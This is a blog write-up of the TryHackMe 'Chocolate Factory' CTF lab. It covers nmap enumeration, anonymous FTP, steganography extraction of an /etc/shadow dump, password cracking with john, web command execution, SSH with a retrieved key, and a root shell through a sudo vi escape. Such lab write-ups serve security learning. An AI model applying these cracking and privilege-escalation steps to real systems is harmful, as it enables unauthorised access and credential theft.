ch's cybersec

Chocolate Factory

Apr 01, 2024

Challenge Link

After starting default nmap scan I found out there are a lot of ports with nothing interesting so i will skip them here

PORT    STATE SERVICE    VERSION
21/tcp  open  ftp        vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r--    1 1000     1000       208838 Sep 30  2020 gum_room.jpg
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.246.43
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA)
|   256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA)
|_  256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519)
80/tcp  open  http       Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
...
113/tcp open  ident?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LDAPBindReq, LPDString, NCP, NULL, RTSPRequest, SIPOptions, afp:
|_    http://localhost/key_rev_key <- You will find the key here!!!
...

Port 113 hints about file. Let’s try to get it:

wget [http://10.10.69.130/key_rev_key](http://10.10.69.130/key_rev_key)

It’s ELF so let’s run strings maybe we will get it!

../../images/Untitled 43.png|Untitled 43.png

I wasn’t able to decode it but I will remember about it

After checking ftp server i found that:

~
❯ ftp 10.10.69.130
Connected to 10.10.69.130.
220 (vsFTPd 3.0.3)
Name (10.10.69.130:ch): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       208838 Sep 30  2020 gum_room.jpg
226 Directory send OK.
ftp> get gum_room.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes).
226 Transfer complete.
208838 bytes received in 0.963 seconds (212 kbytes/s)
ftp> quit
221 Goodbye.

Just an image that might have some info hidden inside.

After running stegseek on that image it found b64.txt.

Let’s decode it

~/CTF/thm/choco
❯ base64 -d gum_room.jpg.out
daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$<REDACTED>/:18535:0:99999:7:::

So it’s
/etc/shadow let’s crack it with john!

Untitled-7.avif

We need to create such a file that mimics output of unshadow command

And just run john hash -w=/usr/share/wordlists/rockyou.txt

Untitled-1-4.avif

I wasn’t able to log in with that password but we can try it on webpage

../../images/Untitled 1 19.png|Untitled 1 19.png

We can run commands! I’ll open burp now to make it easier to work with.

../../images/Untitled 2 17.png|Untitled 2 17.png

Let’s save it and try to ssh with this key! (Don’t forget to run
chmod 400 id_rsa)

../../images/Untitled 3 15.png|Untitled 3 15.png

First thing you should try in privesc is always
sudo -l

../../images/Untitled 4 13.png|Untitled 4 13.png

So we can run vi without password with sudo.

Using vim i know what we can run shell commands in it.

So we run sudo vi

And in it :!bash

../../images/Untitled 5 13.png|Untitled 5 13.png

But there is no root flag! only
root.py

Let’s check it.

../../images/Untitled 6 11.png|Untitled 6 11.png

After replacing that input with key string cause i don’t want to escape
= symbol i got a flag!

../../images/Untitled 7 9.png|Untitled 7 9.png

../../images/Untitled 8 8.png|Untitled 8 8.png

Quite fun but too easy and too straight forward.

Graph View

Backlinks

  • No backlinks found